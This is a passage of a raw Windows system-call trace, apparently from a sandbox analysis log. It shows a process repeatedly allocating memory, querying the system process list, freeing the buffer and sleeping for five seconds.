ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.257] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 